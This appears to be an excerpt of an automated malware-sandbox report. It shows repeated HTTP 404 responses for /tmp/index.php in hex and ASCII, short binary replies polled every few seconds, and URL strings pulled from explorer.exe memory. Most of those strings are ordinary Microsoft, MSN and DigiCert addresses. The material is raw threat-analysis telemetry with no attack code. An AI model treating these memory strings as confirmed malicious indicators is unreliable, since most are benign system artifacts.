2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:18:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: explorer.exe, 00000001.00000000.1719274631.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1720881139.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 00000001.00000000.1719274631.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1720881139.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 00000001.00000000.1719274631.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1720881139.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: explorer.exe, 00000001.00000000.1719274631.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1720881139.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: explorer.exe, 00000001.00000000.1720036058.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1720434520.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1721753963.0000000009B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 00000001.00000000.1723311543.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 00000001.00000000.1723311543.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
      Source: explorer.exe, 00000001.00000000.1719274631.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
      Source: explorer.exe, 00000001.00000000.1719274631.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
      Source: explorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000001.00000000.1720881139.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000001.00000000.1720881139.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
      Source: explorer.exe, 00000001.00000000.1717954667.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1718481604.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000001.00000000.1720881139.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1720881139.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 00000001.00000000.1720881139.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
      Source: explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
      Source: explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
      Source: explorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
